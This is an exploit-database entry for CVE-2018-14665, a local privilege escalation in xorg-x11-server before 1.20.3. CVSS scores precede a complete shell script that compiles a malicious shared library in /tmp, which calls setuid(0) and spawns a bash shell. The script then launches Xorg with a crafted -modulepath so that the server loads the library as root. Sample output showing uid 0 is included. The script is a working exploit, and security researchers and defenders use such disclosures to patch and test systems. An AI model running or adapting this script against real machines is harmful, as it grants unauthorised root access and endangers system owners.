xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation

2018-11-3000:00:00

Marco Ivaldi

www.exploit-db.com

6.6 Medium

CVSS3

Attack Vector

PHYSICAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.1 High

AI Score

Confidence

High

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.032 Low

EPSS

Percentile

91.1%

JSON

#!/bin/sh

#
# raptor_xorgy - xorg-x11-server LPE via modulepath switch
# Copyright (c) 2018 Marco Ivaldi <[email protected]>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission 
# check for -modulepath and -logfile options when starting Xorg. X server 
# allows unprivileged users with the ability to log in to the system via 
# physical console to escalate their privileges and run arbitrary code under 
# root privileges (CVE-2018-14665).
#
# This exploit variant triggers the bug in the -modulepath command line switch
# to load a malicious X11 module in order to escalate privileges to root on
# vulnerable systems. This technique is less invasive than exploiting the 
# -logfile switch, however the gcc compiler must be present in order for it to
# work out of the box. Alternatively, you must use a pre-compiled malicious .so
# compatible with the target system and modify the exploit accordingly.
#
# It works very reliably on Solaris 11.4 and should work on most vulnerable
# Linux distributions (though I haven't tested it). For some reason, it fails to
# obtain uid 0 on OpenBSD... They might have an additional protection in place.
#
# Thanks to @alanc and @nushinde for discussing this alternative vector.
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm
# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html
# https://nvd.nist.gov/vuln/detail/CVE-2006-0745
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xorgy
# raptor@stalker:~$ ./raptor_xorgy
# [...]
# root@stalker:~# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
# CentOS Linux 7 [untested, it should work]
# Red Hat Enterprise Linux 7 [untested]
# Ubuntu Linux 18.10 [untested]
# Ubuntu Linux 18.04 LTS [untested]
# Ubuntu Linux 16.04 LTS [untested]
# Debian GNU/Linux 9 [untested]
# [...]
#

echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch"
echo "Copyright (c) 2018 Marco Ivaldi <[email protected]>"
echo

# prepare the payload
cat << EOF > /tmp/pwned.c
_init()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
EOF
# libglx.so should be a good target, refer to Xorg logs for other candidates
gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so
if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi

# trigger the bug
echo "Got root?"
Xorg -modulepath ",/tmp" :1